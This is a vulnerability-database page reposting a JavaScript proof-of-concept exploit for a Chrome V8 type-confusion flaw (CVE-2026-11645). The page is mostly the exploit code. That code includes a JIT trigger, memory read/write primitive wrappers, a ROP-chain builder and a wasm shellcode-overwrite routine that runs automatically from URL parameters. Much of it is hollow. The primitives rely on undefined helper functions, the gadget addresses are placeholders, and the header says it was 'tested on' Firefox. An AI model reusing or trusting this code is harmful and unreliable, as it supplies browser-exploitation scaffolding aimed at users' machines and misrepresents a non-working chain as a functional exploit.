Lucene search
K

๐Ÿ“„ Google Chrome V8 Type Confusion

๐Ÿ—“๏ธย 16 Jun 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 41ย Views

JavaScript exploit targets Chrome engine V8 type confusion and JIT flaw in versions before 149.0.7827.103.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Out-of-bounds Read in Google Chrome
10 Jun 202623:06
โ€“githubexploit
GithubExploit
Exploit for Out-of-bounds Read in Google Chrome
10 Jun 202615:02
โ€“githubexploit
ATTACKERKB
CVE-2026-11645
8 Jun 202623:27
โ€“attackerkb
AlpineLinux
CVE-2026-11645
8 Jun 202623:27
โ€“alpinelinux
Information Security Automation
June Linux Patch Wednesday
26 Jun 202617:00
โ€“avleonov
BDU FSTEC
The vulnerability of the JavaScript script handler in Google Chromeโ€™s V8 engine allows attackers to execute arbitrary code.
10 Jun 202600:00
โ€“bdu_fstec
Chainguard
CVE-2026-11645 vulnerabilities
10 Jun 202601:17
โ€“cgr
Circl
CVE-2026-11645
8 Jun 202618:00
โ€“circl
CISA KEV Catalog
Google Chromium V8 Out-of-Bounds Read and Write Vulnerability
9 Jun 202600:00
โ€“cisa_kev
CISA
CISA Adds Three Known Exploited Vulnerabilities to Catalog
9 Jun 202612:00
โ€“cisa
Rows per page
==================================================================================================================================
    | # Title     : Google Chrome V8 Type Confusion Exploit Payload met Memory Primitives                                            |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://chromereleases.googleblog.com                                                                            |
    ==================================================================================================================================
    
    [+] Summary    : This JavaScript exploit targets a type confusion vulnerability in the V8 engine of Google Chrome (versions prior to 149.0.7827.103). 
                     It runs inside the browser and attempts to trigger a JIT optimization flaw using repeated object construction patterns.
    
    [+] POC        :  
    
    
    
    (function() {
        'use strict';
    
        const CONFIG = {
            TRAINING_ITERATIONS: 800,
            TRIGGER_ITERATIONS: 1500,
            STRONG_TRIGGER_COUNT: 5,
            STRESS_CYCLES: 8,
            STRESS_DELAY_MS: 700
        };
    
        function log(msg, type = 'info') {
            const statusEl = document.getElementById('status') || document.body;
            const colors = {
                info: '#00ccff',
                success: '#00ff88',
                warning: '#ffaa00',
                error: '#ff4444'
            };
            const timestamp = new Date().toLocaleTimeString();
            const logLine = `[${timestamp}] ${msg}`;
            
            if (statusEl) {
                const p = document.createElement('div');
                p.style.color = colors[type] || colors.info;
                p.textContent = logLine;
                statusEl.appendChild(p);
            }
            console.log(logLine);
        }
    
        function triggerTypeConfusion() {
            try {
                let value = 2;
                class C extends Function {
                    ['AA'] = value;
                }
    
                for (let i = 0; i < CONFIG.TRAINING_ITERATIONS; i++) {
                    new C("'use strict'");
                }
                value = 1.1;
                for (let i = 0; i < CONFIG.TRIGGER_ITERATIONS; i++) {
                    new C("'use strict'");
                }
                
                return true;
            } catch (e) {
                log(`Trigger error: ${e.message}`, 'error');
                return false;
            }
        }
        function strongTrigger() {
            let success = false;
            for (let i = 0; i < CONFIG.STRONG_TRIGGER_COUNT; i++) {
                log(`Strong trigger run ${i + 1}/${CONFIG.STRONG_TRIGGER_COUNT}...`);
                if (triggerTypeConfusion()) {
                    success = true;
                    log(`Trigger ${i + 1} successful`, 'success');
                }
            }
            return success;
        }
        function addrof(obj) {
    
            if (typeof window._addrof === 'function') {
                return window._addrof(obj);
            }
            return null;
        }
    
        function fakeobj(addr) {
            if (typeof window._fakeobj === 'function') {
                return window._fakeobj(addr);
            }
            return null;
        }
    
        function readMemory(addr, size) {
            if (typeof window._read === 'function') {
                return window._read(addr, size);
            }
            return null;
        }
    
        function writeMemory(addr, data) {
            if (typeof window._write === 'function') {
                return window._write(addr, data);
            }
            return false;
        }
    
        function setupPrimitives() {
            log("Setting up memory primitives...");
            
            try {
    
                const ab = new ArrayBuffer(0x1000);
                const dv = new DataView(ab);
                if (typeof window.corruptBackingStore === 'function') {
                    window.corruptBackingStore(dv);
                    return {
                        dataView: dv,
                        read: (addr, size) => {
                            return readMemory(addr, size);
                        },
                        write: (addr, data) => {
                            return writeMemory(addr, data);
                        }
                    };
                }
            } catch (e) {
                log(`Failed to setup primitives: ${e}`, 'error');
            }
            
            return null;
        }
    
        function findChromeBase() {
            const dummy = {};
            const addr = addrof(dummy);
            
            if (addr) {
                log(`Found object address: 0x${addr.toString(16)}`);
                const base = addr & ~0xFFFFFFFF;
                log(`Chrome base candidate: 0x${base.toString(16)}`);
                return base;
            }
            
            return null;
        }
        function buildROPChain(shellcodeAddr) {
    
            const gadgets = {
                pop_rax: 0x414141414141,  
                pop_rcx: 0x424242424242,
                pop_rdx: 0x434343434343,
                pop_rsi: 0x444444444444,
                pop_rdi: 0x454545454545,
                syscall: 0x464646464646,
                virtual_protect: 0x474747474747
            };
            
            const chain = [
                gadgets.pop_rax, 0x50, 
                gadgets.pop_rcx, shellcodeAddr,  
                gadgets.pop_rdx, 0x1000,  
                gadgets.pop_rsi, 0x40,  
                gadgets.pop_rdi, 0, 
                gadgets.syscall
            ];
            
            return new Uint8Array(new Uint32Array(chain).buffer);
        }
        function executeShellcode(shellcode) {
            log("Attempting to execute shellcode...");
            
            try {
                const wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,4,1,96,0,0,3,2,1,0,10,4,1,0,11]);
                const wasmModule = new WebAssembly.Module(wasmCode);
                const wasmInstance = new WebAssembly.Instance(wasmModule, {});
                const wasmFunc = wasmInstance.exports.main;
                
                // Overwrite wasm function with shellcode
                const funcAddr = addrof(wasmFunc);
                if (funcAddr) {
                    writeMemory(funcAddr + 0x10, shellcode);
                    wasmFunc();
                    log("Shellcode executed!", "success");
                    return true;
                }
            } catch (e) {
                log(`Shellcode execution failed: ${e}`, 'error');
            }
            
            return false;
        }
        async function exploit() {
            log("Starting CVE-2026-11645 exploit...");
            log(`Target: Chrome < 149.0.7827.103`);
            const ua = navigator.userAgent;
            const chromeMatch = ua.match(/Chrome\/(\d+)/);
            if (chromeMatch) {
                const version = parseInt(chromeMatch[1]);
                log(`Detected Chrome version: ${version}`);
                if (version >= 149) {
                    log("Browser appears patched", "warning");
                } else {
                    log("Browser appears vulnerable", "success");
                }
            }
            log("Triggering type confusion...");
            if (!strongTrigger()) {
                log("Failed to trigger type confusion", "error");
                return false;
            }
            log("Type confusion triggered successfully!", "success");
            const primitives = setupPrimitives();
            if (!primitives) {
                log("Failed to setup memory primitives", "error");
                return false;
            }
            log("Memory primitives ready", "success");
            const chromeBase = findChromeBase();
            if (!chromeBase) {
                log("Failed to find Chrome base", "warning");
            }
            log("Ready for payload execution");
            
            return true;
        }
        function autoStressTest() {
            log(`Starting auto stress test (${CONFIG.STRESS_CYCLES} cycles)...`);
            
            let cycleCount = 0;
            const interval = setInterval(() => {
                cycleCount++;
                log(`Stress cycle ${cycleCount}/${CONFIG.STRESS_CYCLES}`);
                exploit();
                
                if (cycleCount >= CONFIG.STRESS_CYCLES) {
                    clearInterval(interval);
                    log("Auto stress test completed");
                }
            }, CONFIG.STRESS_DELAY_MS);
            
            return interval;
        }
        window.CVE_2026_11645 = {
            exploit,
            autoStressTest,
            trigger: triggerTypeConfusion,
            strongTrigger
        };
        if (window.location.search.includes('auto=true')) {
            setTimeout(() => autoStressTest(), 1000);
        } else if (window.location.search.includes('exploit=true')) {
            setTimeout(() => exploit(), 1000);
        } else {
            log("CVE-2026-11645 Exploit Ready", "success");
            log("Use ?auto=true for auto-stress or ?exploit=true for single exploit", "info");
        }
    })();
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jun 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.18.8
EPSS0.01654
SSVC
41